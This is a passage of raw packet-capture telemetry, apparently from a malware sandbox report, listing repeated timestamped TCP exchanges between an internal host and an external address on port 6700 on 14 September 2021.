                        Sep 14, 2021 16:19:06.261248112 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:06.306159019 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:06.322443008 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:06.495594978 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:06.540406942 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:06.565785885 CEST670049800194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:07.337760925 CEST498006700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:11.444466114 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:11.639305115 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:11.639578104 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:11.640310049 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:11.854909897 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:11.855521917 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:12.045757055 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:12.048449039 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:12.300661087 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:12.385401011 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:12.443548918 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:12.494026899 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:12.577441931 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:12.577677965 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:12.819417000 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:12.819582939 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:13.010303974 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:13.056608915 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:13.246221066 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:13.290975094 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:13.385416985 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:13.629822016 CEST670049801194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:14.385869026 CEST498016700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:18.479809999 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:18.669514894 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:18.669732094 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:18.723484993 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:18.926723957 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:18.927037954 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:19.116969109 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:19.118251085 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:19.373385906 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:19.448487997 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:19.485517979 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:19.525876045 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:19.639262915 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:19.639481068 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:19.888880014 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:19.891870022 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:20.082609892 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:20.135457993 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:20.325345993 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:20.385423899 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:20.448498011 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:20.698216915 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:21.142903090 CEST670049802194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:21.197922945 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:21.464693069 CEST498026700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:25.643682003 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:25.833509922 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:25.834259987 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:25.839931011 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:26.055593967 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:26.078486919 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:26.268842936 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:26.281039000 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:26.524640083 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:26.524878979 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:26.652209044 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:26.698522091 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:26.714530945 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:26.714709997 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:26.888103008 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:26.932979107 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:26.962131977 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:26.962455034 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:27.153011084 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:27.198429108 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:27.390619993 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:27.432899952 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:27.510138035 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:27.759236097 CEST670049803194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:28.527729988 CEST498036700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:32.944619894 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:33.134531975 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:33.136104107 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:33.156696081 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:33.358834982 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:33.402091026 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:33.445580006 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:33.637620926 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:33.689769983 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:33.875988960 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:34.118524075 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:34.121711016 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:34.368520975 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:34.465502977 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:34.546741962 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:34.590058088 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:34.736799955 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:34.737874985 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:34.837343931 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:34.849783897 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:34.978168011 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:35.044013977 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:35.120292902 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:35.310081005 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:35.356622934 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:37.374079943 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:37.660237074 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:37.837415934 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:37.842997074 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:38.173789978 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:38.337450981 CEST670049804194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:38.340590954 CEST498046700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:42.348798037 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:42.538367987 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:42.538496971 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:42.588764906 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:42.792614937 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:42.798105955 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:42.988668919 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:42.990617037 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:43.241009951 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:43.344001055 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:43.356086969 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:43.545948982 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:43.546186924 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:43.786333084 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:43.788815975 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:43.994602919 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:44.045509100 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:44.240223885 CEST670049809194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:44.357230902 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:44.498385906 CEST498096700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:48.577487946 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:48.767219067 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:48.767353058 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:48.768012047 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:48.979480028 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:48.979836941 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:49.169756889 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:49.179584980 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:49.426259041 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:49.522612095 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:49.533734083 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:49.725783110 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:49.726485014 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:49.973140955 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:49.973342896 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:50.163593054 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:50.217106104 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:50.406897068 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:50.451647043 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:50.592636108 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:50.832389116 CEST670049816194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:51.593508005 CEST498166700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:56.440767050 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:56.630701065 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:56.630827904 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:56.660784006 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:56.867490053 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:56.918816090 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:57.109266043 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:57.109419107 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:57.371659994 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:57.371751070 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:57.617202044 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:57.714122057 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:57.715747118 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:57.905662060 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:57.911103010 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:58.101041079 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:58.103327036 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:58.293301105 CEST670049817194.147.140.20192.168.2.5
                        Sep 14, 2021 16:19:58.343221903 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:19:59.062591076 CEST498176700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:03.146842957 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:03.339514017 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:03.339731932 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:03.340786934 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:03.545366049 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:03.545695066 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:03.735697985 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:03.737004995 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:03.987456083 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:04.128151894 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:04.145188093 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:04.336059093 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:04.336163044 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:04.579277992 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:04.579430103 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:04.769370079 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:04.812129021 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:05.004669905 CEST670049818194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:05.046636105 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:05.282788992 CEST498186700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:09.993381977 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:10.183213949 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:10.183383942 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:10.183965921 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:10.389750004 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:10.453389883 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:10.522972107 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:10.713948011 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:10.714060068 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:10.953620911 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:10.953720093 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:11.203530073 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:11.332680941 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:11.356848001 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:11.546623945 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:11.546758890 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:11.781632900 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:11.781884909 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:11.972460032 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:11.975711107 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:12.166604042 CEST670049819194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:12.219104052 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:12.580535889 CEST498196700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:16.674065113 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:16.866110086 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:16.866309881 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:16.867276907 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:17.078711033 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:17.079344034 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:17.269295931 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:17.291493893 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:17.547472000 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:17.643138885 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:17.706100941 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:17.751293898 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:17.835524082 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:17.835683107 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:17.941167116 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:17.941315889 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:18.078965902 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:18.131412029 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:18.188421965 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:18.378467083 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:18.422875881 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:18.643220901 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:18.891021013 CEST670049820194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:19.643480062 CEST498206700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:23.834708929 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:24.025722980 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:24.025952101 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:24.026916027 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:24.233824968 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:24.234379053 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:24.424973965 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:24.427014112 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:24.662378073 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:24.697240114 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:24.823138952 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:24.876487017 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:24.892508030 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:24.892689943 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:25.081808090 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:25.126892090 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:25.133413076 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:25.133616924 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:25.323964119 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:25.376444101 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:25.568263054 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:25.610892057 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:25.703178883 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:25.942929983 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:26.026922941 CEST670049821194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:26.079776049 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:26.780391932 CEST498216700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:30.965106010 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:31.155028105 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:31.155144930 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:31.155735970 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:31.358818054 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:31.359191895 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:31.552504063 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:31.553708076 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:31.802018881 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:31.898845911 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:31.901112080 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:32.090841055 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:32.090996027 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:32.349004030 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:32.349289894 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:32.540565968 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:32.595755100 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:32.786695004 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:32.830461025 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:32.940505981 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:33.192816019 CEST670049822194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:33.942502975 CEST498226700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:38.037375927 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:38.228245020 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:38.228518963 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:38.229465961 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:38.432528019 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:38.433186054 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:38.623982906 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:38.625874996 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:38.864689112 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:38.941370964 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:39.023583889 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:39.065402031 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:39.132479906 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:39.132800102 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:39.380341053 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:39.380614042 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:39.570954084 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:39.612164974 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:39.802071095 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:39.846487999 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:39.941153049 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:40.192975044 CEST670049823194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:40.957170010 CEST498236700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:45.154249907 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:45.344008923 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:45.344271898 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:45.345283031 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:45.553448915 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:45.554097891 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:45.745531082 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:45.746870041 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:45.984545946 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:45.984656096 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:46.128664017 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:46.175100088 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:46.176970959 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:46.177129030 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:46.366513968 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:46.409476042 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:46.426126003 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:46.426213980 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:46.616446018 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:46.659511089 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:46.849984884 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:46.893919945 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:46.942038059 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:47.198879957 CEST670049824194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:47.941741943 CEST498246700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:52.038585901 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:52.228269100 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:52.228370905 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:52.229115963 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:52.445957899 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:52.446654081 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:52.637219906 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:52.639045954 CEST498256700192.168.2.5194.147.140.20
                        Sep 14, 2021 16:20:52.886298895 CEST670049825194.147.140.20192.168.2.5
                        Sep 14, 2021 16:20:52.942560911 CEST498256700192.168.2.5194.147.140.20
